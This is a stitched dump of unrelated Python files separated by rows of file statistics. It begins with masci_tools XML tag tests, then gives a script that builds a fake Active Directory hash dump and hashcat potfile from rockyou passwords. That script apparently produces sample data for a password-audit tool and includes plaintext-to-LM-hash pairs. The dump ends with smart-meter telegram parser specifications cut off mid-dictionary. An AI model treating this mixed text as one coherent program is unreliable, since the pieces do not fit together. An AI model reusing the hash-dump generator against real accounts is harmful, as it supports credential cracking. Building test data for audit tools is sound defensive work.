root = xmltree.getroot()
tags = [[
'mtSphere',
'atomicCutoffs',
'electronConfig',
'energyParameters',
'lo',
'lo',
], ['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']]
nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
order = ['test_tag', 'mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']
xmltree = xml_create_tag(xmltree, '/fleurInput/atomSpecies/species', 'test_tag', tag_order=order)
tags = [[
'test_tag',
'mtSphere',
'atomicCutoffs',
'electronConfig',
'energyParameters',
'lo',
'lo',
], ['test_tag', 'mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']]
nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
def test_xml_create_tag_tag_order_multiple_occurrences_single(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_create_tag
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
tags = [[
'mtSphere',
'atomicCutoffs',
'electronConfig',
'energyParameters',
'lo',
'lo',
], ['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']]
nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
order = ['test_tag', 'mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']
xmltree = xml_create_tag(xmltree, '/fleurInput/atomSpecies/species', 'test_tag', tag_order=order, occurrences=0)
tags = [[
'test_tag',
'mtSphere',
'atomicCutoffs',
'electronConfig',
'energyParameters',
'lo',
'lo',
], ['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']]
nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
def test_xml_create_tag_tag_order_multiple_occurrences_list(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_create_tag
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
tags = [[
'mtSphere',
'atomicCutoffs',
'electronConfig',
'energyParameters',
'lo',
'lo',
], ['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']]
nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
order = ['test_tag', 'mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']
xmltree = xml_create_tag(xmltree, '/fleurInput/atomSpecies/species', 'test_tag', tag_order=order, occurrences=[-1])
tags = [[
'mtSphere',
'atomicCutoffs',
'electronConfig',
'energyParameters',
'lo',
'lo',
], ['test_tag', 'mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']]
nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
def test_xml_create_tag_errors(load_inpxml):
from masci_tools.util.xml.xml_setters_basic import xml_create_tag
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
with pytest.raises(ValueError, match=r"Could not create tag 'test_tag' because atleast one subtag is missing."):
xml_create_tag(xmltree, '/fleurInput/calculationSetup/not_existent', 'test_tag')
order = ['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']
with pytest.raises(ValueError, match=r"The tag 'test_tag' was not found in the order list"):
xml_create_tag(xmltree, '/fleurInput/atomSpecies/species', 'test_tag', tag_order=order)
order = ['atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']
with pytest.raises(ValueError, match=r"Did not find existing elements in the tag_order list: {'mtSphere'}"):
xml_create_tag(xmltree, '/fleurInput/atomSpecies/species', 'lo', tag_order=order)
def test_xml_create_tag_misaligned_order(load_inpxml):
"""
Test automatic correction of order
"""
from masci_tools.util.xml.xml_setters_basic import xml_create_tag
from masci_tools.util.xml.common_functions import eval_xpath
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
xml_create_tag(xmltree, '/fleurInput/atomSpecies/species', 'ldaU') #This creates an invalid order
xml_create_tag(xmltree, '/fleurInput/atomSpecies/species', 'lo')
order = ['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'ldaU', 'lo']
with pytest.raises(ValueError, match=r'Existing order does not correspond to tag_order list'):
xml_create_tag(xmltree, '/fleurInput/atomSpecies/species', 'ldaU', tag_order=order, correct_order=False)
with pytest.warns(UserWarning, match=r'Existing order does not correspond to tag_order list. Correcting it'):
xml_create_tag(xmltree, '/fleurInput/atomSpecies/species', 'ldaU', tag_order=order)
tags = [['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'ldaU', 'ldaU', 'lo', 'lo', 'lo'],
['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'ldaU', 'ldaU', 'lo', 'lo']]
nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
| 38.038058
| 119
| 0.703743
| 3,509
| 28,985
| 5.551439
| 0.054716
| 0.042967
| 0.042043
| 0.056366
| 0.944969
| 0.921715
| 0.895021
| 0.877207
| 0.833316
| 0.81268
| 0
| 0.015788
| 0.171813
| 28,985
| 761
| 120
| 38.088042
| 0.795709
| 0.016146
| 0
| 0.702355
| 0
| 0
| 0.262654
| 0.121636
| 0
| 0
| 0
| 0
| 0.143469
| 1
| 0.066381
| false
| 0
| 0.143469
| 0
| 0.20985
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c7d5bce714a2763fad5a5b2a66f286eed04f846
| 15,474
|
py
|
Python
|
sample_data/base/gendata.py
|
bennettwarner/DPAT
|
c0417928b6351035bb5da891e7dea86d3445e0cf
|
[
"MIT"
] | 697
|
2016-11-23T01:54:56.000Z
|
2022-03-28T22:31:43.000Z
|
sample_data/base/gendata.py
|
bennettwarner/DPAT
|
c0417928b6351035bb5da891e7dea86d3445e0cf
|
[
"MIT"
] | 14
|
2016-11-29T15:25:52.000Z
|
2021-06-22T18:01:54.000Z
|
sample_data/base/gendata.py
|
bennettwarner/DPAT
|
c0417928b6351035bb5da891e7dea86d3445e0cf
|
[
"MIT"
] | 136
|
2016-11-23T00:57:19.000Z
|
2022-03-02T08:53:53.000Z
|
#!/usr/bin/python
import random,hashlib,binascii, os
cwd = os.getcwd()
print(cwd)
f_first = open("sample_data/base/first.txt")
f_last = open("sample_data/base/last_small.txt")
f_passwords = open("sample_data/base/subset-rockyou.txt")
f_das= open("sample_data/Domain Admins.txt","w")
first_list=list(f_first)
count_first = 0
domains = [ "parent.domain.com","child.domain.com","sister.domain.com"]
domain_admins = {
'Agnes.Aarons-admin':'reallylongone',
'Cliff.Adames-admin':'PasswordsAreHardToRemember',
'Alex.Revis-admin':'57kdhfls*%2',
'Gilbert.Settle-admin':'Ford57andGolf',
'Cory.Ruhoff-admin':'NewPassword4Work',
'Damian.Scarver-admin':'domainAdminPass',
'Oscar.Veyna-admin':'ShirtsNSkins',
'Rex.Vidot-admin':'1997hereo',
'Scot.Viles-admin':'sparklesparkleZAP',
'Burton.Vonner-admin':'VonnerPass16',
'Dayna.Wade-admin':'Winter16',
'Dustin.Wahlund-admin':'Frank-did-it',
'Earnestine.Waiau-admin':'HappyTogether16',
'Emerson.Wala-admin':'Washington87',
'Sallie.Zych-admin':'77qwerty88',
'Samuel.Zysk-admin':'Zundk8*&^',
'Rosalinda.Zusman-admin':'Making Up Passwords is Hard',
'Roman.Zurek-admin':'goFigure8',
'Celia.Mcintosh-admin':'WikiWiki4What',
'Celeste.Mcintire-admin':'2beornot2be',
'Cecil.Mcinnis-admin':';kleknklk',
'Brendan.Mcgriff-admin':'DontForget1',
'Booker.Mcgraph-admin':'DaisyMisty1',
'Bobbie.Mcgrane-admin':'P@sswo0rd16',
'Clint.Hollifield-admin':'1997Married',
'Coleen.Hollinghead-admin':'MickyMouse56',
'Jackie.Dimodica-admin':'JerermyNHanna2',
'Isabella.Dimitroff-admin':'Anastasia',
'Horace.Dimarco-admin':'LovedByYou',
'Herbert.Dils-admin':'DiamondRIO3',
'Hazel.Dillman-admin':'L1ke1T',
'Rex.Beadling-admin':'ITdoma1n@dmin',
'Reggie.Beacher-admin':'WorldTurn@round',
'Raul.Beaber-admin':'Lovemybug2003',
'Pete.Baysmore-admin':'Hard24get',
'August.Mcginnis-admin':'W$%23eu&*!rhs0'
}
lm_dict = { 'NotTooHard':'5B9D1AFCC9784729ADD5B1A41F2CB2C0','GoBeavErs1997':'94068F2F1CD1EAF27F76AAABE8E8789D','W$%23eu&*!rhs0':'4CE5B0C344FDD1038930410E6B652F2C','edward!':'67449A7AB9FDFA3AAAD3B435B51404EE','edhardy':'3AF628952D3CBDADAAD3B435B51404EE','ededed':'564B1B69A0CD5B23AAD3B435B51404EE','eddie22':'E3F874C4772EDC14AAD3B435B51404EE','earth1':'01EB2BDB90E4B363AAD3B435B51404EE','eagles36':'99223CC16C15AFCDC81667E9D738C5D9','dylanc':'BA0997645137628BAAD3B435B51404EE','dylanb':'4C72E2913A32E8A4AAD3B435B51404EE','dulceteamo':'0F8C1562718B774A6905068007DD26FD','dude1234':'4107C659B6183D65FF17365FAF1FFE89','druglord':'AC1F31C2E70BCB654A3B108F3FA6CB6D','droppie':'07E0ED6353B36D0AAAD3B435B51404EE','drink':'62B7CD49704064BDAAD3B435B51404EE','dragon17':'4097A469B4C52C1D7C3113B4A1A5E3A0','dracko':'A9327557F0E7E4FDAAD3B435B51404EE','downlow':'B44617E2CA667704AAD3B435B51404EE','douloveme':'62D3291BD468609863E11CD7E7F6092C','dothack':'6EAD70E9C296822BAAD3B435B51404EE','dotaallstar':'2987CC09184A44DE2201161DEDBA27A2','dorin':'947EB89A035D9D34AAD3B435B51404EE','dontspeak':'3B4F679F335D1535F04D685C382B531C','donnalyn':'A8E4E642B0A16CB6E72C57EF50F76A05','donnabelle':'97C88C474C40FE9589AF081E0305AC84','donika':'E5BF9342F4E51BA6AAD3B435B51404EE','dominate':'8C0D796F72023FB017306D272A9441BB','dolphy':'E75827B521C31229AAD3B435B51404EE','dollars1':'D456D433BC6A41B9C2265B23734E0DAC','doitbig':'E13F262D76132450AAD3B435B51404EE','doinita':'CA217F811088BC03AAD3B435B51404EE','dogandcat':'78028473533F1F269D4D37E81433E320','dobby':'CB94142B12F47F70AAD3B435B51404EE','dmarie':'B6ECEACBE041745CAAD3B435B51404EE','djones':'976EC97B7362B073AAD3B435B51404EE','divya':'DB9BDEDFC37408AFAAD3B435B51404EE','disney365':'DA505805AB7FCF926AB0B9B4DA013120','discoball':'82D8597A58DDB87C066B9E64566C2479','diogenes':'452265562B3B49B293E28745B8BF4BA6','dingaling':'D220E3D19587CFFCDD4218F5E59DD23A','dinamovista':'DD28D12979294E0C9A7853FCD68523F6','dimsum':'14BB788F701AC833AAD3B435B51404EE','dientes':'316A62A9E5078672AAD3B435B51404EE','diegoandres':'631D8A94ACF9ADF45F6B9B201665ECFF','diego14':'AE310716574EDF80AAD3B435B51404EE','diego13':'B466FE535D0D691CAAD3B435B51404EE','dick12':'8A49C00370347B9BAAD3B435B51404EE','dianna1':'713505C5D104BA61AAD3B435B51404EE','diablo69':'A3BE40622851765909752A3293831D17','dhianne':'8D78D2735A3A4379AAD3B435B51404EE','devon7':'CC6DC07DB80BEF75AAD3B435B51404EE','devin11':'67B2EF958AF6F612AAD3B435B51404EE','deventer':'2013970F2DB4971C944E2DF489A880E4','devan1':'0ADD5FD620A482C2AAD3B435B51404EE','destined':'830BA0309744B2C24A3B108F3FA6CB6D','dessire':'975DB741FFD6D065AAD3B435B51404EE','design1':'4C1AB3AC6E05EB1DAAD3B435B51404EE','desiderio':'6A1C2D9A85892C26DF61CA35DEE5AA58','derry':'8416E3769D5FB679AAD3B435B51404EE','derrty':'28F566AF5658CCBAAAD3B435B51404EE','derek3':'9CF17DB1CB859EABAAD3B435B51404EE','derek22':'1B033D2858D542D9AAD3B435B51404EE','dennis01':'C8396E60C4987FB8C2265B23734E0DAC','denisuca':'9DC7423CB84514547584248B8D2C9F9E','denise14':'4E61A3280511BCC9FF17365FAF1FFE89','deniece':'6537F0EC75253266AAD3B435B51404EE','dementia':'75EEA72B6DE5C2EC7584248B8D2C9F9E','della1':'69666E0FCE54D3F1AAD3B435B51404EE','deliverance':'FC29BE7F95F1A281354EF550D6D616DF','delgadillo':'E77BDBF6AE2B3D930279963575FF2D48','deldel':'CDEA18537CB83F8FAAD3B435B51404EE','deion':'CE5205F9E3F1D158AAD3B435B51404EE','defoe18':'5811452C87D01332AAD3B435B51404EE','deeper':'A1886219150AE350AAD3B435B51404EE','deejay1':'B2DF80A944C9CB0CAAD3B435B51404EE','dee-dee':'1F17C1545FC9D496AAD3B435B51404EE','death2u':'539706F3890A934BAAD3B435B51404EE','dearly':'ACB63C873C70EDFFAAD3B435B51404EE','deadline':'D9989D2AEB2F392817306D272A9441BB','dead666':'56D719A22A00943EAAD3B435B51404EE','dayday123':'C7C9EB383B9066CCB75E0C8D76954A50','dayani':'269D8839491A9E6CAAD3B435B51404EE','day123':'76B6E26A7386D775AAD3B435B51404EE','daville':'1523F21BDB224D64AAD3B435B51404EE','davegrohl':'45B69A7B44018AB1EB90FCD89E798A49','dave21':'1173D0A5814FC7A5AAD3B435B51404EE','dario1':'684AAF0C9563CC51AAD3B435B51404EE','darin':'B29A4A5669527F0AAAD3B435B51404EE','darel':'963D8FB64DF80D69AAD3B435B51404EE','danyale':'1F1C9E6BDAF385BFAAD3B435B51404EE','dannyteamo':'C5660362EC7308AF6905068007DD26FD','danielle05':'41A5DF84E34D4393B0D866F8E2272AD6','daniel87':'D78FF2C06D3B72B27C3113B4A1A5E3A0','dani23':'F100ACF2FF2ADE44AAD3B435B51404EE','dani1':'175E69F189D25399AAD3B435B51404EE','dancok':'91824FD4185EE910AAD3B435B51404EE','dancingdiva':'81380963DA03E29697440C3488F02677','dancewithme':'C8B325EBE380D5C756496D0A2CF27A20','dancer26':'FEAE74B8E1947D9BC81667E9D738C5D9','dancer03':'894CBEC1AC35440D1AA818381E4E281B','dancechick':'449EC1BFA0F80FB272F8DA9D69F474D7','dancarter':'0F261E270277EE3E8963805A19B0ED49','dana1':'68E66D68E3AD2A0FAAD3B435B51404EE','dallas41':'73F3C9B1038B4422C2265B23734E0DAC','dallas15':'59CC3F718A14BD029C5014AE4718A7EE','dallas08':'C6FB9E6F7DB3F27036077A718CCDF409','dallas07':'C6FB9E6F7DB3F2707C3113B4A1A5E3A0','daisy!':'8EBDE0B1057D172EAAD3B435B51404EE','daine':'A6D663D5197DEA9AAAD3B435B51404EE','dailyn':'09F11E1A2F255F7FAAD3B435B51404EE','daddysboy':'69B507AAFDD2F72E655265D1314726C0','daddylove':'805D046BD8B55712B6FE535A75CB5552','daddy1234':'E42F9B3895F1F7B219F10A933D4868DC','daddy03':'82E76E96B3FCEFF3AAD3B435B51404EE','cynthia3':'BF65484F9EAA59351AA818381E4E281B','cymone':'DC9AF42629FA0778AAD3B435B51404EE','cutiepie16':'287ACD99E5A71EA619DB94ADC99423BF','cuters':'C435D7E4789C5286AAD3B435B51404EE','cupcake4':'E0009F6A725132CBFF17365FAF1FFE89','cunt69':'06AC388690048B3DAAD3B435B51404EE','cuddlebug':'375A10B1E5F43E45D17FDCAAB966EFA7','cuckoo':'E749D93A7BE08AC5AAD3B435B51404EE','cuadra':'C5D055D5402EA371AAD3B435B51404EE','cstrike':'4A3F0486D35169C7AAD3B435B51404EE','crystal11':'87650E47E4D141585D3872C04445E010','crystal01':'87650E47E4D1415873251AA2B4314B90','cristea':'64EC8CB777E8E2EDAAD3B435B51404EE','creeds':'FA0F7946A915FD06AAD3B435B51404EE','crazy4ever':'99EBBDF7699BA6D0B12FAE38C8ABEE13','crawfish':'0E4BABFD43EEC5C15ACDCD7C247FA83A','craig2':'2373F7A3D68F3C2BAAD3B435B51404EE','crackwhore':'47CA74079D90D70D5468F2AD1F3B98BA','cowgirl07':'131BE2583DE651E718FCD526FB48A829','cowboys5':'CC954BF64510840D9C5014AE4718A7EE','courtney4':'063DE5A00E0BBA01744F2D424178DE49','cotita':'F6E1814A19F0DC3DAAD3B435B51404EE','costas':'03B9455205B8464AAAD3B435B51404EE','corona12':'D60C67A63F8821691D71060D896B7A46','cornbread1':'75ED8AC86B42E2B9042370C4583C388F','corey13':'372336BE0DB2D2C8AAD3B435B51404EE','coolaid':'27F0F886CD1DE9C3AAD3B435B51404EE','cookie04':'4DBF38B0A644F62FFF17365FAF1FFE89','contagious':'496CE23950764D4A5BE30F58D2A941D5','contabilitate':'332F012EDCC53D731DAB72D6A1727041','connor02':'17A1143A6E6E42821D71060D896B7A46','conner2':'62CFCE559EC73CADAAD3B435B51404EE','comunidad':'8AD5C85747A9E2BD9C749B84168D712D','common1':'9E39676A49F99C52AAD3B435B51404EE','columbus1':'CADD68BDB2673CA30CC3EB564B0F9047','colon':'1AB94AAF9FE60AE1AAD3B435B51404EE','coley1':'51BD657CEB4457CFAAD3B435B51404EE','coldheart':'0532CF033F5955B35F034D624633DBF9','codylinley':'B671C9AF04D37B08F15DB3BDBAD92750','cody07':'DB455B1B86B8A058AAD3B435B51404EE','cody04':'3DC6DD72755CCFE9AAD3B435B51404EE','coco08':'F26B193B103F6AD4AAD3B435B51404EE','cocknose':'A2D4DFAFA94D7B5D17306D272A9441BB','clubber':'4027C45050D0DC04AAD3B435B51404EE','cleo':'3CAB28372DB1715EAAD3B435B51404EE','clears':'E9596D59EDCD0C22AAD3B435B51404EE','claudia12':'FDAA24DE0BCBEB854207FD0DF35A59A8','civics':'A21064406DD6C682AAD3B435B51404EE','citron':'9840ABA3424EBA78AAD3B435B51404EE','cintakamu':'9564A655D10805450BBD7D4C25A4DEFA','ciclope':'C155BC1446E5101CAAD3B435B51404EE','chute':'8DBDFBAA0CF03C76AAD3B435B51404EE','chula12':'5A4C094D73768C02AAD3B435B51404EE','chuche':'0652223D8E88744DAAD3B435B51404EE','christians':'630505E57DC5617E8E4DD189F947B5EC','chrischris':'B6760E35ED0103CD85BB7C52C41086D7','chris83':'E2F432F581BF8148AAD3B435B51404EE','chris2005':'41973827B8184CF96FB9A7EF37043CD6','chonchis':'80AAA6EB2DC0233093E28745B8BF4BA6','chocorrol':'501E06987BD244E97BB1D8438F805B5C','chocolatelover':'81D330F45391D6CDD21334332AE253C7','choclate1':'B1067D8E77DD0072A202B0A0CC08E46E','chivas15':'BA237827413B85849C5014AE4718A7EE','chimes':'7C03C765BFC529A9AAD3B435B51404EE','chikitalinda':'6A5DF180A72046188315F2B502B247DC','chikis1':'04AE55C4E6F75BB5AAD3B435B51404EE','chickenwings':'5E9019CC921146AC00F4888F92F39DF9','chicharron':'A138C2D50AC9C5063140C07381B6A165','chica15':'B3D2CC98E2BC3F63AAD3B435B51404EE','chevygirl':'725DA578E9D54C1D2DCA4431C6F3913D','cherry9':'616778FE4E03EB13AAD3B435B51404EE','cherries2':'328FB4F46E4A4EDA74F23606C66022B0','cherie1':'A30A2797D55E44E1AAD3B435B51404EE','cheetah2':'0BEBB7B76F9F09A01D71060D896B7A46','cheeseontoast':'34DC70895752909D63C3F1914814DF78','cheese23':'1B8DB7D20C6C244B1AA818381E4E281B','cheese14':'3A5F48756650F617FF17365FAF1FFE89','cheer55':'ADF3815AE0113EE6AAD3B435B51404EE','cheene':'214BA788DBF79432AAD3B435B51404EE','chean':'4A07877A1FD2D2E0AAD3B435B51404EE','chassy':'3569B3396667A9A2AAD3B435B51404EE','charlie88':'528A05A387553DC56C4691C0029EBE9F','charlie27':'528A05A387553DC5025A32A63FE04BEC','charlie20':'528A05A387553DC5143F8BD9AE9E0363','charlie18':'528A05A387553DC58347BB1E72CC9F76','chaparra1':'CEF00CDAA153648F65C4A55F32B3BF85','chaochao':'A3EB50453623B039E68AA26A841A86FA','changed1':'67B011CF3539A3E3C2265B23734E0DAC','chalie':'E80D509ABABDE9C4AAD3B435B51404EE','chakas':'5ED7F084F1839FD7AAD3B435B51404EE','chad69':'BF34878165770EEEAAD3B435B51404EE','chachie':'3091167271E136C2AAD3B435B51404EE','chabe':'BF1008C067449CFFAAD3B435B51404EE','cha123':'84126D3AA15B64D0AAD3B435B51404EE','cha-cha':'F7E38693146CED75AAD3B435B51404EE','cfc123':'B10D8883941986DCAAD3B435B51404EE','cesar2':'745B312CE52C3F88AAD3B435B51404EE','ceriwis':'D0BA7E97FC3E9290AAD3B435B51404EE','centinela':'E7D941ADA594566EB09321E47427AF3C','cena11':'4656FDC59974A241AAD3B435B51404EE','cena01':'268D5E2B37583A0AAAD3B435B51404EE','celtic08':'4467856BF476733B36077A718CCDF409','cedes':'8A337C28CE3265FFAAD3B435B51404EE','cecilita':'6D02B4EFE4C3AE017584248B8D2C9F9E','cdcdcd':'4DAB65D458627A62AAD3B435B51404EE','cbr900rr':'ADF862771AC0FA35944E2DF489A880E4','cazares':'19E925C350B4A289AAD3B435B51404EE','UpPeRlOwEr':'3630E260BC5D7049249A4622CE4C83C8','HarD222cRacK':'051B0FC10EAE6A6D22EF373F485DF6BD','resgocswit7hWQ':'90C0059BFB22BB44F657FC2061517840','lastBUTnotLEAS':'47AAF1C238FCBAB597FAF9A0F46316C1'}
dontCrackWithNT = ["W$%23eu&*!rhs0","UpPeRlOwEr","HarD222cRacK","resgocswit7hWQ","lastBUTnotLEAS"]
dontNTCrackTheseUsers = ["Bobbie.Mcgrane-admin","Rosalinda.Zusman-admin","Cecil.Mcinnis-admin", "Cory.Ruhoff-admin","Cliff.Adames-admin","Samuel.Zysk-admin"]
f = open("customer.ntds","w")
f2 = open("hashcat.potfile","w")
wroteRHS = False
for last in f_last:
add_admin = False
if count_first < len(first_list):
firstName = first_list[count_first].rstrip().title()
count_first = count_first + 1
else:
count_first = 0
firstName = first_list[count_first].rstrip().title()
lastName = last.rstrip().title()
userName = firstName + "." + lastName
if userName + "-admin" in domain_admins:
userName = userName + "-admin"
password = f_passwords.readline().rstrip()
if domain_admins.has_key(password):
print "Warn: duplicated password for administrator: " + password
rid = str(random.randint(10000,500000))
domain = domains[random.randint(0,len(domains)-1)]
if domain_admins.has_key(userName):
password=domain_admins[userName]
domain=domains[1]
f_das.write(domain + "\\" + userName + "\n")
if userName in ["Agnes.Aarons-admin","Alex.Revis-admin","Burton.Vonner-admin","Pete.Baysmore-admin"]:
add_admin = True
nt_hash = binascii.hexlify(hashlib.new('md4', password.encode('utf-16le')).digest())
lm_hash = "aad3b435b51404eeaad3b435b51404ee" # this is the LM hash of a blank password
if lm_dict.has_key(password):
lm_hash = lm_dict[password]
f.write(domain + "\\" + userName + ":" + rid + ":" + lm_hash.lower() + ":" + nt_hash + ":::\n")
# simulating password history, up to 24 entries generated for each user, 78% of these simulated as cracked
for x in range(0, 24):
if (random.randrange(0,100)<5):
break
hist_password = password + str(24 - x)
hist_nt_hash = binascii.hexlify(hashlib.new('md4', hist_password.encode('utf-16le')).digest())
f.write(domain + "\\" + userName + "_history" + str(x) + ":" + rid + ":aad3b435b51404eeaad3b435b51404ee:" + hist_nt_hash + ":::\n")
if (random.randrange(1,100)<78):
f2.write(hist_nt_hash + ":" + hist_password + "\n")
if (password not in dontCrackWithNT) and (userName not in dontNTCrackTheseUsers) and (password in lm_dict or random.randrange(1,100)<78):
f2.write(nt_hash + ":" + password + "\n")
if password in dontCrackWithNT:
left_pass=password[0:8].upper()
right_pass=password[8:15].upper()
left_hash=lm_dict[password][0:16].lower()
right_hash=lm_dict[password][16:32].lower()
if password != "W$%23eu&*!rhs0" or not wroteRHS:
f2.write(left_hash + ":" + left_pass + "\n")
f2.write(right_hash + ":" + right_pass + "\n")
if password == "W$%23eu&*!rhs0":
wroteRHS = True
if add_admin:
f.write(domain + "\\" + userName.rstrip("-admin") + ":" + rid + ":" + lm_hash.lower() + ":" + nt_hash + ":::\n")
f2.write("aad3b435b51404ee:\n")
f.close()
f2.close()
f_first.close()
f_last.close()
f_passwords.close()
| 132.25641
| 10,336
| 0.79695
| 1,087
| 15,474
| 11.280589
| 0.635695
| 0.005709
| 0.00367
| 0.004404
| 0.030664
| 0.019899
| 0.019899
| 0
| 0
| 0
| 0
| 0.333699
| 0.056482
| 15,474
| 117
| 10,337
| 132.25641
| 0.506164
| 0.010405
| 0
| 0.036364
| 0
| 0
| 0.705963
| 0.498792
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.254545
| 0.009091
| null | null | 0.018182
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
1341ded9e5e9d4af3dd9ac99860ea134cb0abe48
| 8,086
|
py
|
Python
|
dsmr_parser/telegram_specifications.py
|
avandermeer/dsmr_parser
|
dc902a83e9fa683bac50e40251c175c79974d734
|
[
"MIT"
] | null | null | null |
dsmr_parser/telegram_specifications.py
|
avandermeer/dsmr_parser
|
dc902a83e9fa683bac50e40251c175c79974d734
|
[
"MIT"
] | null | null | null |
dsmr_parser/telegram_specifications.py
|
avandermeer/dsmr_parser
|
dc902a83e9fa683bac50e40251c175c79974d734
|
[
"MIT"
] | null | null | null |
from decimal import Decimal
from copy import deepcopy
from dsmr_parser import obis_references as obis
from dsmr_parser.parsers import CosemParser, ValueParser, MBusParser, ProfileGenericParser
from dsmr_parser.value_types import timestamp
from dsmr_parser.profile_generic_specifications import BUFFER_TYPES, PG_HEAD_PARSERS, PG_UNIDENTIFIED_BUFFERTYPE_PARSERS
"""
dsmr_parser.telegram_specifications
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module contains DSMR telegram specifications. Each specifications describes
how the telegram lines are parsed.
"""
V2_2 = {
'checksum_support': False,
'objects': {
obis.EQUIPMENT_IDENTIFIER: CosemParser(ValueParser(str)),
obis.ELECTRICITY_USED_TARIFF_1: CosemParser(ValueParser(Decimal)),
obis.ELECTRICITY_USED_TARIFF_2: CosemParser(ValueParser(Decimal)),
obis.ELECTRICITY_DELIVERED_TARIFF_1: CosemParser(ValueParser(Decimal)),
obis.ELECTRICITY_DELIVERED_TARIFF_2: CosemParser(ValueParser(Decimal)),
obis.ELECTRICITY_ACTIVE_TARIFF: CosemParser(ValueParser(str)),
obis.CURRENT_ELECTRICITY_USAGE: CosemParser(ValueParser(Decimal)),
obis.CURRENT_ELECTRICITY_DELIVERY: CosemParser(ValueParser(Decimal)),
obis.ACTUAL_TRESHOLD_ELECTRICITY: CosemParser(ValueParser(Decimal)),
obis.ACTUAL_SWITCH_POSITION: CosemParser(ValueParser(str)),
obis.TEXT_MESSAGE_CODE: CosemParser(ValueParser(int)),
obis.TEXT_MESSAGE: CosemParser(ValueParser(str)),
obis.EQUIPMENT_IDENTIFIER_GAS: CosemParser(ValueParser(str)),
obis.DEVICE_TYPE: CosemParser(ValueParser(str)),
obis.VALVE_POSITION_GAS: CosemParser(ValueParser(str)),
obis.GAS_METER_READING: MBusParser(
ValueParser(timestamp),
ValueParser(int),
ValueParser(int),
ValueParser(int),
ValueParser(str), # obis ref
ValueParser(str), # unit, position 5
ValueParser(Decimal), # meter reading, position 6
),
}
}
V3 = V2_2
V4 = {
'checksum_support': True,
'objects': {
obis.P1_MESSAGE_HEADER: CosemParser(ValueParser(str)),
obis.P1_MESSAGE_TIMESTAMP: CosemParser(ValueParser(timestamp)),
obis.EQUIPMENT_IDENTIFIER: CosemParser(ValueParser(str)),
obis.ELECTRICITY_USED_TARIFF_1: CosemParser(ValueParser(Decimal)),
obis.ELECTRICITY_USED_TARIFF_2: CosemParser(ValueParser(Decimal)),
obis.ELECTRICITY_DELIVERED_TARIFF_1: CosemParser(ValueParser(Decimal)),
obis.ELECTRICITY_DELIVERED_TARIFF_2: CosemParser(ValueParser(Decimal)),
obis.ELECTRICITY_ACTIVE_TARIFF: CosemParser(ValueParser(str)),
obis.CURRENT_ELECTRICITY_USAGE: CosemParser(ValueParser(Decimal)),
obis.CURRENT_ELECTRICITY_DELIVERY: CosemParser(ValueParser(Decimal)),
obis.SHORT_POWER_FAILURE_COUNT: CosemParser(ValueParser(int)),
obis.LONG_POWER_FAILURE_COUNT: CosemParser(ValueParser(int)),
obis.POWER_EVENT_FAILURE_LOG:
ProfileGenericParser(BUFFER_TYPES,
PG_HEAD_PARSERS,
PG_UNIDENTIFIED_BUFFERTYPE_PARSERS),
obis.VOLTAGE_SAG_L1_COUNT: CosemParser(ValueParser(int)),
obis.VOLTAGE_SAG_L2_COUNT: CosemParser(ValueParser(int)),
obis.VOLTAGE_SAG_L3_COUNT: CosemParser(ValueParser(int)),
obis.VOLTAGE_SWELL_L1_COUNT: CosemParser(ValueParser(int)),
obis.VOLTAGE_SWELL_L2_COUNT: CosemParser(ValueParser(int)),
obis.VOLTAGE_SWELL_L3_COUNT: CosemParser(ValueParser(int)),
obis.TEXT_MESSAGE_CODE: CosemParser(ValueParser(int)),
obis.TEXT_MESSAGE: CosemParser(ValueParser(str)),
obis.DEVICE_TYPE: CosemParser(ValueParser(int)),
